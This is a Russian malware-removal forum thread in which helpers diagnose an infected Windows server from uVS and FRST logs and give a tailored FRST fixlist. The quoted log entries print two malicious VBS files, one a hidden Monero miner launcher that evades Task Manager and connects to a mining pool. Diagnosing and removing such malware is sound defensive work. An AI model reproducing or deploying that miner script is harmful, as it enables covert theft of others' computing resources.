нет доступа к avz.exe

Здравствуйте, подозреваю в системе вирус, хотел воспользоваться AVZ, но при распаковке выходит ошибка "нет доступа к файлу avz.exe"
Если копировать распакованную папку со здоровой машины, копируется все, кроме AVP.exe, keylogger.avz и rootkit.avz
Если переименовать avz.exe, то он копируется нормально, переименованный avp не обновляет базы, пишет нет доступа к keylogger.avz и rootkit.avz
Если запустить проверку есть сообщение
Внимание !! Ошибка загрузки базы антируткита - проверка перехватов UserMode не производится

Подскажите в какую сторону копать, drweb cureit не находит ничего.

Уважаемый(ая) [B]Infist[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Начать с изучения правил.

[QUOTE=mike 1;1458371]Начать с изучения правил.[/QUOTE]
угу, дальше?

Прикрепить необходимый лог.

[QUOTE=mike 1;1458395]Прикрепить необходимый лог.[/QUOTE]
Уважаемый, вы хоть вопрос читали? У меня AVZ не запускается.
[COLOR=#555555][FONT=Arial]Файл AutoLogger.exe при запуске тоже падает в ошибку "нет доступа к папке"
Я НЕ МОГУ создать лог...[/FONT][/COLOR]

Пробуйте [url=http://dragokas.com/php/Autologger/AutoLogger-pif.zip]этой[/url] версией собрать логи.

[QUOTE=mike 1;1458405]Пробуйте [URL="http://dragokas.com/php/Autologger/AutoLogger-pif.zip"]этой[/URL] версией собрать логи.[/QUOTE]

вот такая ошибка:
[ATTACH=CONFIG]663316[/ATTACH]

С рабочего стола запускайте автологгер

[QUOTE=mike 1;1458424]С рабочего стола запускайте автологгер[/QUOTE]
данная ошибка возникает независимо от расположения автологгера, хоть с рабочего стола, хоть с диска D: (даже при максимально выданных правах на папку, откуда стартует автологгер ошибка все равно остается)

для подтверждения вот скриншот ошибки при запуске с рабочего стола:
[ATTACH=CONFIG]663321[/ATTACH]

[LIST=1][*]Скачайте [B][URL="https://yadi.sk/d/6A65LkI1WEuqC"]Universal Virus Sniffer[/URL][/B] (uVS)[*]Извлеките uVS из [I]архива[/I] или из [I]zip-папки[/I]. Откройте папку с UVS и запустите файл [B]start.exe[/B]. В открывшимся окне выберите пункт [B]"Запустить под текущим пользователем"[/B].[*]Выберите меню [B]"Файл"[/B] => [B]"Сохранить полный образ автозапуска"[/B]. Программа предложит вам указать место сохранения лога в формате [B]"имя_компьютера_дата_сканирования"[/B]. Лог необходимо сохранить на рабочем столе.
[INDENT][SIZE="1"][B]!!!Внимание.[/B] Если у вас установлены архиваторы [B]WinRAR[/B] или [B]7-Zip[/B], то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.[/SIZE][/INDENT][*]Дождитесь окончания работы программы и прикрепите лог к посту в теме.
[INDENT][SIZE="1"][B]!!! Обратите внимание[/B], что утилиты необходимо запускать от имени Администратора. По умолчанию в [B]Windows XP[/B] так и есть. В [B]Windows Vista[/B] и [B]Windows 7[/B] администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать [B]Запуск от имени Администратора[/B], при необходимости укажите пароль администратора и нажмите [B]"Да"[/B].[/SIZE][/INDENT][*][/LIST]

[QUOTE=mike 1;1458437][LIST=1]Дождитесь окончания работы программы и прикрепите лог к посту в теме.[/QUOTE]

не нашел функцию прикрепить файл в "ответить";
через "прислать запрошенный карантин" тоже не получается
выкладываю на свой гугл-диск
[url]https://drive.google.com/file/d/0B_Y-WJBZBwLhT0F4cHhXcHZTTzQ/view?usp=sharing[/url]

Это ваше?

[QUOTE]Полное имя C:\PROGRAMDATA\SERVICE\HP.VBS
Имя файла HP.VBS
Тек. статус ПОДОЗРИТЕЛЬНЫЙ в автозапуске [Запускался неявно или вручную]

Сохраненная информация на момент создания образа
Статус ПОДОЗРИТЕЛЬНЫЙ в автозапуске [Запускался неявно или вручную]
Размер 179 байт
Создан 18.04.2017 в 12:29:39
Изменен 17.04.2017 в 19:16:08
Атрибуты СКРЫТЫЙ СИСТЕМНЫЙ
Цифр. подпись Отсутствует либо ее не удалось проверить

Статус ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла "Скрытый" или "Системный" [типично для вирусов]

Доп. информация на момент обновления списка
SHA1 6E2B1E50A642DC8DF43FD0475C012EC152D844C7
MD5 70731F0354941A9E96B5AD608E3670A3

#FILE# Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "1.bat" & Chr(34), 0
WinScriptHost.Run Chr(34) & "st.bat" & Chr(34), 0
Set WinScriptHost = Nothing

Ссылки на объект
Ссылка C:\USERS\AUDIT\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\HP.LNK
SHORTCUT C:\USERS\AUDIT\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\HP.lnk
[/QUOTE]

[QUOTE]Полное имя C:\USERS\ELENA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\UPDATER.VBS
Имя файла UPDATER.VBS
Тек. статус в автозапуске

Сохраненная информация на момент создания образа
Статус в автозапуске
Размер 1407 байт
Создан 08.07.2017 в 09:27:04
Изменен 08.07.2017 в 17:47:28
Цифр. подпись Отсутствует либо ее не удалось проверить

Доп. информация на момент обновления списка
SHA1 25B6E9783474891C572C877DC105A6EC435D9364
MD5 A0487FF7501FCC03A0A8D64EF8E89668

#FILE# Set WshShell = CreateObject("WScript.Shell")
Set WshShell = Nothing
On error resume next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20
strComputer = "."
Set objWMIService = GetObject("winmgmts:\" & strComputer & "\root\CIMV2")
Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL",wbemFlagReturnImmediately + wbemFlagForwardOnly)
cores=0
For Each objItem In colItems
cores=cores + objItem.NumberOfLogicalProcessors
Next
cores=cores-1
do
WScript.Sleep 500
Set taskcolitem = objWMIService.ExecQuery("Select * from Win32_Process")
taskmgrisrun=false
For Each objItem in taskcolitem
If objItem.Name="Taskmgr.exe" OR objItem.Name="taskmgr.exe" Then
taskmgrisrun=True
Exit For
End If
Next
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "pciemngr.exe" Then
Running = True
Set thisprocess=objItem
Exit For
End If
Next
If taskmgrisrun Then
If Running Then
thisprocess.Terminate
End if
If Not Running Then
Running=True
End if
End if
If Not Running Then
WScript.Sleep 500
WshShell.Run WshShell.ExpandEnvironmentStrings("%APPDATA%")&"\Aledaxo\pciemngr.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email][email protected][/email] -p x -t "&cores, 0
End if
Loop

Ссылки на объект
Ссылка C:\USERS\ELENA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP
[/QUOTE]

Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.

[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list=1][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что под окном [b]Optional Scan[/b] отмечены [i]"List BCD"[/i], [i]"Driver MD5"[/i] и [i]"90 Days Files"[/i].[*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
[img]http://i.imgur.com/3munStB.png[/img]

[QUOTE=mike 1;1458566]Это ваше?
[COLOR=#555555]Полное имя C:\PROGRAMDATA\SERVICE\HP.VBS[/COLOR]
[COLOR=#555555]Имя файла HP.VBS

[/COLOR][COLOR=#555555]Полное имя C:\USERS\ELENA\APPDATA\ROAMING\MICROSOFT\WINDOWS\S TART MENU\PROGRAMS\STARTUP\UPDATER.VBS[/COLOR]
[COLOR=#555555]Имя файла UPDATER.VBS[/COLOR]
[/QUOTE]

явно нет, эти файлы вычистил, кстати.... в папке [COLOR=#555555]C:\PROGRAMDATA\SERVICE\ [/COLOR] лежат еще три файла (chrome.exe и explorer.exe и pubwincu.reg), которые я не смог удалить (ошибка безопасности, нет доступа к файлу, владельцем файла так же не смог стать, опять таки ошибка "отказано в доступе", хотя учетка админская)

после удаления вышеуказанных и перезагрузки, проблема с запуском AVZ все еще сохраняется, система не вылечена.
логи FRST прикладываю.

А это знакомо?

[QUOTE]C:\Program Files\Kontron\ipmiutil\checksel.cmd[/QUOTE]

Включите восстановление системы на сервере.

[B][COLOR="#FF0000"]ВНИМАНИЕ![/COLOR][/B] Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

[list=1][*][URL="https://clck.ru/9knjD"][B]Временно[/B] выгрузите антивирус, файрволл и прочее защитное ПО[/URL].[*]Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[code]
CreateRestorePoint:
Startup: C:\Users\AUDIT\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HP.lnk [2017-04-17]
ShortcutTarget: HP.lnk -> C:\ProgramData\Service\HP.vbs (No File)
GroupPolicy: Restriction <==== ATTENTION
GroupPolicyScripts: Restriction <==== ATTENTION
GroupPolicyScripts\User: Restriction <==== ATTENTION
CHR HKU\S-1-5-21-1602194203-84453621-307072597-500\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
S2 wcvvses; C:\Windows\Inf\axperflib\0010\0011\000A\0010\mms.exe [X]
S2 wscsvs; C:\Windows\Inf\axperflib\0010\0011\000E\0015\mms.exe [X]
2017-07-25 19:09 - 2017-04-18 12:29 - 00000000 ____D C:\Users\Все пользователи\Service
2017-07-25 19:09 - 2017-04-18 12:29 - 00000000 ____D C:\ProgramData\Service
Task: {F38A5FF8-7B6F-424C-95E0-3106384B65AE} - System32\Tasks\DSite => C:\Users\C834~1.CHI\AppData\Roaming\DSite\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
[/code][*]Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении![*][B][COLOR="Blue"]Внимание![/COLOR][/B] Если на рабочем столе будет создан архив [b]Дата_время.zip[/b], то загрузите этот архив через [url=http://virusinfo.info/upload_virus.php?tid=37678]данную форму[/url][/list]

[QUOTE=mike 1;1458686]А это знакомо?
[COLOR=#555555]C:\Program Files\Kontron\ipmiutil\checksel.cmd[/COLOR]
[/QUOTE] Да это знакомо, это свое.

[QUOTE=mike 1;1458686]

[LIST=1][*]Запустите FRST и нажмите один раз на кнопку [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Пожалуйста, прикрепите его в следующем сообщении![*][B][COLOR=Blue]Внимание![/COLOR][/B] Если на рабочем столе будет создан архив [B]Дата_время.zip[/B], то загрузите этот архив через [URL="http://virusinfo.info/upload_virus.php?tid=37678"]данную форму[/URL][/LIST]
[/QUOTE]


Fixlog прикладываю, [B]Дата_время.zip отсутствует.

Папка [/B][COLOR=#555555][FONT=Arial]C:\PROGRAMDATA\SERVICE после фикса отсутствует (видимо удалена), но проблема с AVZ все еще не решилась, система не вылечена.[/FONT][/COLOR]

А с чего вы взяли, что проблема с АВЗ может как-то связана с вирусами? Допускаю, что имеется проблема совместимости АВЗ с серверной ОС, либо есть какая-то активная локальная политика, которая прописана в правилах. Судя потому, что уже нашлось, ваш дедик уже находится не под вашим контролем, и злоумышленники как минимум подобрали пароль к RDP и одной из учетных записей с привилегиями администратора.